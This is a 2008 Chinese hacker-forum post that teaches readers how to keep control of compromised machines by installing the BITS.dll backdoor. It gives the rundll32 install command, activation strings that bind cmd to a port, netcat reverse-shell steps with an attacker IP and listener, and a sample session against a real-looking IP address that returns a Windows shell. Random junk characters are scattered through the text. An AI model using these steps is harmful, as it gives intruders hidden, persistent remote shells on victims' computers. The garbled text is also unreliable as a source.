我爱电脑技术论坛 » 网络安全区 » 用隐形后门来保护肉鸡

不和人说话 发表于 2008-6-24 13:40

用隐形后门来保护肉鸡

向大家介绍一种很好的后门技术DLL插入型后门.它的好处就是不会开放端口.不会在进程中出现.很多黑民们都会有疑问dll怎么实现后门的呢 .dll又不是exe程序可以启动怎么会有这么大的功能呢.答:因为dll后门不是靠自身启动的.大家应该知道exe程序在运行的时候可以调用dll文件..哪么程序员在写程序的时候只要在dll中修改一些变量就可以将dll绑定到一些系统的服务中启到后门的作用.下面我就介绍一个国内著名黑客小榕的dll后门作品bits.dll其实使用很简单q:?4?N,O'QI jo
q-`1~&^^r7?
首先将bits.dll上传到肉鸡上使用administrator或者localsysytem进行$R;L&|Ju'P;Naz"q
'WB Nm"w-^
安装7~{I#DSw;mW%C!t

|e\
QnY)W3v 使用命令:rundll32.exe BITS.dll,Install <Active Strings>
w)vE9XP8p(_

P7\;v QkU*F)U3Vq"i(^ Active Strings是用户自己指定的一个特征字符串，用于激活BITS。4M"akw1WgW

'FUwjR A,u 安装成功后就可以进行联接了
5h"[uK+N}6oc+x
DYU0}'b^ 正向连接： D5Yi]D
PT k'yL|a
1、用nc连接目标主机的任何一个TCP端口（80/139/445.....）|8z+{bDqL
2、按照以下格式输入激活命令
H0By$[Pt/B6S$rx0T0B <Active Strings>@dancewithdolphin[xell]:<PORT>
'~
@~~)C 例如，在安装的时候设定了Active Strings为BITS Door，将CMD绑定在端口99：(r7V
`'^R(R
BITS Door@dancewithdolphin[xell]:99
Y+uY^&qj+X h;Ik5yc!Sl
这样目标主机就会将CMD绑定在99。
;N tuln8B 3、连接目标主机的指定端口（上例中为99）
4T"d2a2BSa:hA2y !S&B*VN e C}

#d9IXz]W%l 反向连接：c5Hgw)O A;xc

^ U8\Z1X5a+v 很多情况下主机是在防火墙后面的，这样就需要用反向连接。
{ r
cTWj3MG
hN+dZ0@6E
fb 1、在本地使用NC监听（如：nc -l -p 1234)2W*n}%zJ5n GZZ
2、用nc连接目标主机的任何一个防火墙允许的TCP端口（80/139/445.....）~QsixF!UI
3、按照以下格式输入激活命令
b`~M@&~A6H${ <Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port>,J5P-lX:?r5H#`o[
例如，在安装的时候设定了Active Strings为BITS Door，本机地址为1.1.1.1, nc在1234
"sw6G`Q 端口监听：Z*xhuCN
BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234RY8}F(@z+Y!U
4、目标主机的CMD将会出现在NC监听的端口1234。
}J/cQ;M3BN
T/jLm#E?,R 注意：所有的输入都区分大小写。%n l)l;s!v
r:k,xu.NM;K
例:
N4g}$S9H2^"d.S 5GX8AG~F_'sq
C:\My Documents>nc 219.237.63.199 139+?7F7H&wI!W3ca
securitystrings@dancewithdolphin[xell]:7t2n'|h8P!wuC
?BpD;vC;qs1[lN7K

[;Zk^^Sb7j C:\My Documents>nc 219.237.63.199 7
lrw8P\5t ?Microsoft Windows 2000 [Version 5.00.2195]
0K/G}G ~D (C) 版权所有 1985-2000 Microsoft Corp. we;pN)r-s+l3[
T6eh N%va M l
C:\WINNT\system32>~:[1wZp1h3q.|,o
:s
kx)@2f byW
祝大家好运 T5U`FU\
*D/s9F"[7J5P5i*t
注:如果有什么地方写错了请高手们指出

查看完整版本: 用隐形后门来保护肉鸡